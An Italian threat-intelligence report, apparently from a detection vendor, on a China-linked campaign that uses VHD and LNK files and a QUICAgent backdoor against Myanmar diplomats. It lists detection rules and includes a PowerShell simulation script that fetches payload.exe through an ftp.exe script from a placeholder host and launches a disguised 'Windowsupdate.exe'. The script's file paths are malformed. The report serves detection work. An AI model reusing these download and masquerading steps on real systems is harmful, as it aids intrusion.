SOC Prime Bias: High

18 Aug 2026 06:27 UTC

Attore legato alla Cina usa file VHD per colpire diplomatici del Myanmar

Author Photo
SOC Prime Team linkedin icon Segui
Attore legato alla Cina usa file VHD per colpire diplomatici del Myanmar
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Un attore di minaccia con legami alla Cina sta prendendo di mira il personale governativo del Myanmar attraverso una catena di infezioni a più stadi consegnata tramite file Virtual Hard Disk (VHD). La campagna utilizza file LNK malevoli per abusare di ftp.exe per la ricostruzione del payload e distribuisce un backdoor personalizzato basato su Go noto come QUICAgent. Il malware si affida a Cloudflare Workers per la risoluzione dinamica del C2 e comunica tramite il protocollo QUIC.

Indagine

Il team APT di Seqrite ha analizzato i campioni VHD contenenti documenti esca e identificato file LNK malevoli camuffati da file PDF. L’indagine ha rivelato una tecnica di payload divisa in cui due file sono combinati con il comando copy per ricostruire un eseguibile. L’analisi tecnica dell’impianto QUICAgent ha anche rivelato l’evasione del sandbox tramite hash SHA-256 ripetuti e una validazione personalizzata dei certificati TLS.

Mitigazione

Le organizzazioni dovrebbero limitare l’esecuzione di file LNK non attendibili e monitorare i processi figli sospetti che coinvolgono ftp.exe. Si raccomanda un controllo rigoroso sull’uso di Virtual Hard Disk (VHD) e il monitoraggio del traffico di rete insolito sulla porta UDP 443 utilizzando QUIC. Bloccare i noti endpoint malevoli di Cloudflare Worker può anche interrompere il meccanismo di risoluzione C2 della campagna.

Risposta

Se viene rilevata un’attività QUICSILVER, i sistemi interessati devono essere immediatamente isolati per fermare ulteriori esfiltrazioni di dati e comunicazioni C2. Gli investigatori dovrebbero ispezionare %LOCALAPPDATA% per il binario Windowsupdate.exe e controllare la cartella di avvio dell’utente per SystemIn.lnk. I registri di rete dovrebbero essere analizzati per connessioni a domini C2 e indirizzi IP noti per determinare l’entità della compromissione.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevazioni

Possibile File LNK Malevolo con Doppia Estensione (via cmdline)

Team SOC Prime
17 ago 2026

Possibile File Malevolo con Doppia Estensione (via process_creation)

Team SOC Prime
17 ago 2026

Possibile Operazione Manuale o di Scripting Eseguita in Cartelle Insolite (via cmdline)

Team SOC Prime
17 ago 2026

LOLBAS ftp (via cmdline)

Team SOC Prime
17 ago 2026

Binario/Core Sospetti in Posizione di Avvio Automatico (via file_event)

Team SOC Prime
17 ago 2026

Esecuzione Sospetta da Unità Montata (via audit)

Team SOC Prime
17 ago 2026

Possibile Abuso di Dominio di Sviluppo Cloudflare (via dns)

Team SOC Prime
17 ago 2026

IOCs (HashSha256) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD

Regole AI SOC Prime
17 ago 2026

IOCs (SourceIP) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD

Regole AI SOC Prime
17 ago 2026

IOCs (DestinationIP) per rilevare: Operazione QUICSILVER: attore con legami alla Cina prende di mira i diplomatici del Myanmar tramite un backdoor Go consegnato via VHD

Regole AI SOC Prime
17 ago 2026

Rilevazione di Comunicazione C2 di QUICAgent [Connessione di Rete Windows]

Regole AI SOC Prime
17 ago 2026

Uso Sospetto di ftp.exe e Windowsupdate.exe per l’Esecuzione di Malware [Creazione di Processo di Windows]

Regole AI SOC Prime
17 ago 2026

Esecuzione di Simulazione

Requisito Preliminare: La Verifica Preliminare di Telemetria e Baseline deve essere passata.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrazione e Comandi di Attacco: Un avversario mira a stabilire un punto di appoggio imitando i processi di sistema legittimi. Per prima cosa, utilizza ftp.exe con un file script (-s:) per scaricare un payload malevolo, cercando di confondersi con attività amministrative automatizzate. Simultaneamente, simulano il dispiegamento di un binario “Windows Update” (rinominato) per mascherare l’esecuzione del payload. Infine, utilizzano uno script PowerShell progettato per creare un file .lnk malevolo per garantire la persistenza tramite l’interazione dell’utente.

  • Script di Test di Regressione:

    # 1. Simula download tramite script FTP (Trigger 1 Parte A)
    $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit"
    $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII
    Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait
    
    # 2. Simula esecuzione di Windowsupdate.exe (Trigger 1 Parte B)
    # Nota: Questo presuppone che esista un file di nome Windowsupdate.exe o che venga chiamato
    # Per la simulazione, creeremo un file dummy e lo eseguiremo
    New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force
    Start-Process "$env:TEMPWindowsupdate.exe"
    
    # 3. Simula creazione LNK tramite PowerShell (Trigger 2)
    Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'"
  • Comandi di Pulizia:

    # Rimuovi artefatti simulati
    Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue